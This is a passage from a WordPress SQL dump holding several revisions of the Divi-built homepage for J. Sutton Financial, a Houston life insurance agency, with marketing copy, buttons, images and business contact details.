19:40:09','',138,'http://cmdev-site1.com/?p=640',0,'revision','',0),(642,1,'2023-04-02 19:41:20','2023-04-02 19:41:20','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"Want to know how much you need?\" typing_effect=\"Let\'s find out!\" before_new_line=\"on\" typing_backspeed=\"200ms\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" global_colors_info=\"{}\"][/dsm_typing_effect][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_fullwidth_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" title_text=\"Downtown Houston skyline\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_fullwidth_image][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:41:20','2023-04-02 19:41:20','',138,'http://cmdev-site1.com/?p=642',0,'revision','',0),(641,1,'2023-04-02 19:40:15','2023-04-02 19:40:15','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_3,1_3,1_3\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Get a Quote\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" before_typing_effect=\"Want to know how much you need?\" typing_effect=\"Let\'s find out!\" hover_enabled=\"0\" sticky_enabled=\"0\" header_level=\"h2\" header_text_align=\"center\" typing_backspeed=\"200ms\" before_new_line=\"on\"][/dsm_typing_effect][dsm_button button_one_text=\"Get a Quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" button_one_bg_enable_color=\"on\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:40:15','2023-04-02 19:40:15','',138,'http://cmdev-site1.com/?p=641',0,'revision','',0),(645,1,'2023-04-02 19:45:51','2023-04-02 19:45:51','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" 